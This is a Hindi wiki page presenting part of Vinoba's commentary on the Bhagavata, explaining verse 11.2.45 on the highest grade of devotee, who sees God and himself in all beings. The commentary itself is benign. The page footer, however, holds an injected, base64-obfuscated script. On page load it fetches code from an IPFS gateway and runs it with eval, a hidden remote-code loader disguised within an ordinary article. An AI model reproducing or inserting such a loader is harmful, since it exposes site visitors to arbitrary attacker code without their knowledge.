भागवत धर्म सार -विनोबा भाग-81

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

भागवत धर्म मिमांसा

2. भक्त लक्षण

भक्तों के तीन प्रकार

इस (तीसरे) अध्याय के पहले तीन श्लोक ही खास महत्व रखते हैं। यहाँ भक्तों के तीन दर्जे किए गए हैं। इस तरह से भक्तों के दर्जे और कहीं किए गए नहीं दीखते।

'
(3.1) सर्व-भूतेषु यः पश्येत् भगवद्भावमात्मनः।
भूतानि भगवत्यात्मन्येष भागवतोत्तमः।।[1]

पहला वर्ग है सर्वोत्तम भक्त का। भागवतोत्तमः का अर्थ है उत्तम भक्त। उत्तम भक्त कौन होगा? यः सर्वभूतेषु भगवद्भावम् आत्मनः पश्येत्- जो सब भूतों में भगवान् को देखेगा और अपने को भी देखेगा। यहाँ दुगुना विचार कहा गया है : सब भूतों में भगवान् की भावना और अपनी भी भावना करना। मित्र- मंडली में अपनी भावना करन सरल है, किंतु सब भूतों में अपने को देखना थोड़ा कठिन है। पर यहाँ कहा गया है कि सब भूतों में अपना ही दर्शन होना चाहिए। प्रथम अपना दर्शन और फिर भगवान् का दर्शन। सोचने की बात है कि सब भूतों में अपने को देखना सरल है या भगवान् को देखना? भगवान् को देखना सरल लगता है, लेकिन यदि किसी की भगवान् पर श्रद्धा न हो तो उसके लिए सब भूतों में अपने को देखना ही एक तरीका होगा। वैसे तो यह बात कठिन अवश्य है। माँ अपने बच्चे में अपने को देखती है, लेकिन दूसरे के बच्चों के लिए उसकी वह भावना नहीं रहती। इसलिए भगवान् की ज्योति सबमें है, यह मानना आसान लगता है। फिर भी उसके लिए ईश्वर पर श्रद्धा चाहिए। वैसी श्रद्धा न हो तो सबमें अपनी भावना करना अधिक सरल होगा। यह नास्तिकों के लिए सहूलियत है। फिर दूसरी बहात बतायी : भूतानि भगवति आत्मनि एषः पश्येत्- भक्त सब भूतों को भगवान् में, अपने में भी देखता है। यानी सब ओतप्रोत है। मतलब यह कि भगवा में प्राणिमात्र हैं और प्राणिमात्र में भगवान् है। हममें सब भूत हैं और सब भूतों में हम हैं- चार बातें समझा दीं। वैसे देखा जाय तो दुनिया में अनेक भेद हैं, लेकिन जड़, चेतन और परमात्मा, ये प्रमुख भेद हैं। उनमें भी अवान्तर भेद हैं। जड़ यानी सारी अचेतन सृष्टि। सृष्टि में पत्थर, पानी, पेड़, पहाड़, ये सारे भेद पड़े हैं। घड़ी, कुर्सी, चश्मा, ये भेद भी हैं। एक का काम दूसरी वस्तु नहीं कर पाती। इसी तरह चेतन-चेतन में भी भेद हैं। मनुष्य अलग और गदहा अलग। यही क्यों, मनुष्य-मनुष्य में भी भेद हैं। जैसे परमेश्वर और जड़ में भेद होता है, वैसे ही परमेश्वर और चेतन में भी है। तो, कुल मिलकार पाँच प्रकार के भेद हुए : 1 जड़-चेतन, 2. जड़-जड़, 3. चेतन-चेतन, 4. परमेश्वर-जड़ और 5. परमेश्वर-चेतन। किंतु भागवत ये सारे भेद खतम करने की बात कह रही है। इन पाँचों भेदों में जो अभेद देखेगा, वही उत्तीर्ण होगा। वह ‘भागवतोत्मः’ होगा यानी उत्तम भक्त होगा। प्रथम श्रेणी का, पहले दर्जे का भक्त होगा। इस तरह की आशा रखना तो ठीक ही है।


« पीछे आगे »

टीका टिप्पणी और संदर्भ

  1. 11.2.45

संबंधित लेख

- <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>